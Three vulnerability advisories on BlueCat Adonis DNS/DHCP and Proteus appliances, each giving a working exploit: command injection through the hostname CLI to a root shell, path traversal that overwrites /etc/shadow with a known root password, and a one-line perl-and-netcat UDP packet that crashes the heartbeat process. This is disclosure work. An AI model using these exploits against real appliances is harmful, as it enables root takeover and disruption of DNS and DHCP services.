TS-2007-003-0: BlueCat Networks Adonis CLI root privilege escalation
Template Security Security Advisory --- BlueCat Networks Adonis CLI root privilege escalation Date: 2007-08-16 Advisory ID: TS-2007-003-0 Vendor: BlueCat Networks, http://www.bluecatnetworks.com/ Revision: 0 Contents Summary Software Version Details Impact Exploit Workarounds Obtaining Patched Software Credits Revision History Summary --- Template Security has discovered a root privilege escalation vulnerability in the BlueCat Networks Adonis DNS/DHCP appliance which allows the admin user to gain root privilege from the Command Line Interface (CLI). Software Version Adonis version 5.0.2.8 was tested. Details --- The admin account on the Adonis DNS/DHCP appliance provides access to a CLI that allows an administrator to perform tasks such as setting the IP address, netmask, system time and system hostname. By entering a certain command sequence, the administrator is able to execute a command as root. Impact -- Access to the admin account is the same as root access on the appliance. Exploit --- Here we use the 'set host-name' CLI command to execute a root shell: :adonisset host-name ;bash adonis.katter.org [EMAIL PROTECTED]:~# id uid=0(root) gid=0(root) groups=0(root) NOTE: There may be other command sequences that accomplish the same result. Workarounds --- Only provide admin account access to administrators that also have root account access on the appliance. Obtaining Patched Software -- Contact the vendor. Credits --- forloop discovered this vulnerability while enjoying a Tuborg Gold. forloop is a member of Template Security. Revision History 2007-08-16: Revision 0 released
TS-2007-002-0: BlueCat Networks Adonis root Privilege Access
Template Security Security Advisory --- BlueCat Networks Adonis root Privilege Access Date: 2007-08-06 Advisory ID: TS-2007-002-0 Vendor: BlueCat Networks, http://www.bluecatnetworks.com/ Revision: 0 Contents Summary Software Version Details Impact Exploit Workarounds Obtaining Patched Software Credits Revision History Summary --- Template Security has discovered a serious user input validation vulnerability in the BlueCat Networks Proteus IPAM appliance. Proteus can be used to upload files to managed Adonis appliances to be downloadable by TFTP from the appliance. A Proteus administrator with privilege to add TFTP files and perform TFTP deployments can overwrite existing files and create new files as root on the Adonis DNS/DHCP appliance. This can be used for example to overwrite the system password database and change the root account password. Software Version Proteus version 2.0.2.0 and Adonis version 5.0.2.8 were tested. Details --- Proteus allows TFTP files to be named by an administrator, and there is no data validation performed for user input such as relative paths. Files are supposed to be copied only to the /tftpboot/ directory, and the file copy is performed with root privilege. This means for example that a file named ../etc/shadow will overwrite the shadow password database /etc/shadow. Impact -- Successful exploitation of the vulnerability will result in root access on the Adonis appliance. Exploit --- 0) Create a new TFTP Group in a Proteus configuration. 1) Add a TFTP deployment role specifying an Adonis appliance to the group. 2) At the top-level folder in the new TFTP group, add a file named ../etc/shadow (without the quotes) and load a file containing the following line: root:Im0Zgl8tnEq9Y:13637:0:9:7::: NOTE: The sshd configuration uses the default setting 'PermitEmptyPasswords no', so we specify a password of bluecat. 3) Deploy the configuration to the Adonis appliance. 4) You can now login to the Adonis appliance as root with password bluecat. $ ssh [EMAIL PROTECTED] [EMAIL PROTECTED]'s password: # cat /etc/shadow root:Im0Zgl8tnEq9Y:13637:0:9:7::: NOTE: This example assumes SSH is enabled, iptables permits port tcp/22, etc. Many attack variations are possible, such as changing system startup scripts to modify the iptables configuration on the appliance. Workarounds --- The attack can be prevented by creating an access right override at the configuration level to disable TFTP access for each administrator. Obtaining Patched Software -- Contact the vendor. Credits --- defaultroute discovered this vulnerability while performing a security review of the Proteus IPAM appliance (a discovery fueled by Red Bull and techno). defaultroute is a member of Template Security. Revision History 2007-08-06: Revision 0 released
TS-2007-001-0: BlueCat Networks Adonis Linux-HA heartbeat DoS Vulnerability
Template Security Security Advisory --- BlueCat Networks Adonis Linux-HA heartbeat DoS Vulnerability Date: 2007-07-29 Advisory ID: TS-2007-001-0 Vendor: BlueCat Networks, http://www.bluecatnetworks.com/ Revision: 0 Contents Summary Software Version Details Impact Exploit Workarounds Obtaining Patched Software Credits Revision History Summary --- Template Security has discovered a serious Denial of Service (DoS) vulnerability in the BlueCat Networks Adonis DNS/DHCP Appliance. When XHA is configured to place two Adonis servers in an active-passive pair to provide high availability, a remote attacker can transmit a single UDP datagram to crash the heartbeat control process. This can be used for example to create an active/active condition in the cluster pair. Software Version Adonis version 5.0.2.8 was tested, and XHA was configured using the Proteus IPAM appliance. It is possible any version of Adonis using heartbeat version 1.2.4 or earlier is vulnerable. Details --- XHA on Adonis uses the heartbeat software from the Linux-HA project (http://www.linux-ha.org/). On the version of Adonis we tested, heartbeat version 1.2.3 is used. This version is vulnerable to a well-known remote DoS attack which was announced on 2006-08-13: http://www.linux-ha.org/_cache/SecurityIssues__sec03.txt Impact -- Successful exploitation of the vulnerability will result in a DoS condition affecting critical DNS and DHCP services. Exploit --- In this example the XHA cluster is composed of: node-1: 192.168.1.12 node-2: 192.168.1.13 VIP:192.168.1.11 A remote attacker can perform the following to crash the heartbeat control process on node-1: $ perl -e 'print ###\n2147483647heart attack:%%%\n' | nc -u 192.168.1.12 694 If node-1 is the active node in the cluster, node-2 will take over the VIP and the cluster will be in an active/active condition. Other scenarios are possible, such as crashing the control process on the passive node to prevent it from being able to assume the active role in a failure condition. Note that the iptables configuration on Adonis does not block packets to 694/udp; there is an explicit policy to permit port 694/udp from any to any in the INPUT and OUTPUT chain. To verify this, you can login as root on the appliance and view the firewall configuration script: # grep 694 /usr/local/bluecat/doFirewall iptables -A INPUT -p udp --dport 694 -j ACCEPT iptables -A OUTPUT -p udp --dport 694 -j ACCEPT $IP6TABLES -A INPUT -p udp --dport 694 -j ACCEPT $IP6TABLES -A OUTPUT -p udp --dport 694 -j ACCEPT Workarounds --- The attack can be prevented by blocking packets to 694/udp. This can be performed at a firewall and by modifying the iptables configuration on the Adonis appliances. Appropriate anti-spoofing policies must also be in place, because an attacker can spoof the source IP address in the UDP datagram. When XHA was configured, iptables rules were configured in /usr/local/bluecat/firewall_rules/localHAFirewallConfig to permit 694/udp to and from the peer node on each appliance. However, these rules have no effect due to the rules mentioned above. And they are also incorrect because they specify source port 694/udp, and the heartbeat packets we observed do not use a fixed source port. One possible workaround which may be used to temporarily prevent the attack is to comment out the 694/udp rules in the firewall startup script then repair the rules in localHAFirewallConfig. However, localHAFirewallConfig can be overwritten by /usr/local/bluecat/configLocalFirewall.sh. Due to this, we recommend that customers do not modify the iptables configuration, and block 694/udp and perform anti-spoofing at a firewall. Obtaining Patched Software -- Contact the vendor. Credits --- forloop discovered that Adonis XHA was using vulnerable heartbeat software, and defaultroute read the heartbeat code to discover the exploit. Both are members of Template Security. Revision History 2007-07-29: Revision 0 released
